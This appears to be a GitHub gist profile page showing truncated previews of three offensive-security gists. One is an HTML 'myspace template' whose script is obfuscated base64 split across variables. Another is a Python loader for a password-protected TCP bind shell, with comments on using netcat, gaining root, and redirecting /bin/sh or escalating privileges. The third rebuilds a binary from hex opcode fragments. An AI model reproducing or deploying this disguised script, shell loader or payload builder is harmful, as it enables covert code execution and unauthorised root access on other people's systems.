Skip to content

Instantly share code, notes, and snippets.

View netspooky's full-sized avatar
🍙
Meditating

【☆ ゆう ☆ 】 netspooky

🍙
Meditating
View GitHub Profile
@netspooky
netspooky / myspace_template.html
Created September 30, 2017 02:52
Blingee Designs
<html><script>/*. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . */
ci="nVuY3Rpb24gZ";io="O319ZCgpOw==";jk="jMmhwYm1wcE1";/* . */mm="lKC0tXzB4OW";
jw="VuY3Rpb24oX";og="yIF8weDVlNT";/*. . . . . . . . . . . .*/ps="GNITTZMeTly";
cn="1cm4gXzB4Mm";d5="MHhjZWRkKCcw";/*. . . . . . . . . . . */df="MHgyNjQ1NDV";
re="HgyNjQ1NDVbJ";rm="vbihfMHgyODQ";/*. . */k1="NlZGQoJzB4M";rp="zB4MTE0ZDEw";
rv="icpXTtfMHgx";/*. . . . . . . . . . . .*/ij="E0PV8weGVkZ";k5="xfMHhjZWRkK";
k7="NTA3MCkrYXR";/* . . */k8="I3YjAzW18weG";k9="HgyODQ2MjE9";we="ihfMHg5ZTM0";
wh="ZD1mdW5jdGl";/*. . .*/ag="XIgXzB4Y2Vk";sn="NjIxXTtyZXR";ww="8weDExNGQxMD";
k6="Cgpe3ZhciBf";/* . . .*/xz="UzNDYxKXtfM";zz="2MjEsXzB4NT";g9="BjMzhkKXtfM";
tg="1mdW5jdGlvb";/*. . . . . . . . . . . */tk="h2YXIgXzB4M";so="IgXzB4MmZmOG";
@netspooky
netspooky / shinji3_loader.py
Last active October 24, 2017 00:43
Shinji 3
import binascii, subprocess
######################################################
# Shinji 3 is a proof of concept password protected #
# TCP Bind Shell binary. This one only works on #
# localhost, but you could modify to send /bin/sh #
# wherev, or use for local priv esc (: #
# #
# First create a listener $ nc -lvp 4444 #
# Then run the loader + binary #
# Then type the password 'ayy!' to become root. #
@netspooky
netspooky / misato.py
Created August 29, 2017 01:35
Binary Loader
import binascii
import subprocess
t = [ "0000","005f","0100","015f","0200",
"0201","0300","0400","0500","056a",
"0600","0800","0853","0900","0d00",
"1000","1100","1400","1800","1900",
"1b00","2000","2100","2900","2e73",
"2e74","2f62","2f73","31c0","3800",
"3801","3b0f","3e00","4000","4831",